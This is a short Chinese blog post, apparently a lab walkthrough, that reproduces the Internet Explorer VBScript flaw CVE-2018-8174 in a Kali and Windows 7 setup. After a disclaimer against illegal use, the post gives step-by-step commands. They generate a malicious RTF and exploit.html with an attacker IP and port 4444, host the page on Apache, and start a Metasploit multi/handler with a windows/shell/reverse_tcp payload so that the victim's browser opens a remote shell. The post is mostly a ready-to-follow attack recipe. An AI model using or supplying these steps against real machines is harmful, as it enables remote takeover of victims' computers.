0DAY漏洞——CVE-2018-8174复现

0DAY漏洞——CVE-2018-8174复现

注:

·本文所有演示均为本地虚拟环境,讲解只是为了读者更好地理解漏洞原理,以达到保护信息安全的目的,请勿用于非法用途!

·严禁利用本文中所提到的技术和漏洞进行非法攻击,否则后果自负,作者将不承担任何责任!

环境:kali , window7系统。

步骤:1.从github下载CVE-2018-8174文件。

git clone https://github.com/XXX/XXX

2.进入到该文件中查看。

cd CVE-2018-8174_EXP-master

ls

3.生成恶意链接。

python2 CVE-2018-8174.py -u http://192.168.152.166/exploit.html -o zxs.rtf -i192.168.152.166 -p 4444

注意:CVE-2018-8174.py使用的python2版本的编写规则,如果使用python3会报错。建议大家使用python2。当提示successfully则表明已经成功。

4.可以看到此时已经生成相应的html文件。

5.将exploit.html部署到apache2中并启动该服务。

sudo cp exploit.html /var/www/html

cd /var/www/html

6.进入到msf中选择相应的exploit进行攻击。

msfconsole

use exploit/multi/handler

7.设置相应的LHOST和LPORT以及payload。

set lhost 192.168.XXX.XXX

set lport XXXX

set payload windows/shell/reverse_tcp

8.运行

run

9.在windows7中的ie浏览器打开之前设置的网址。

10.测试

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值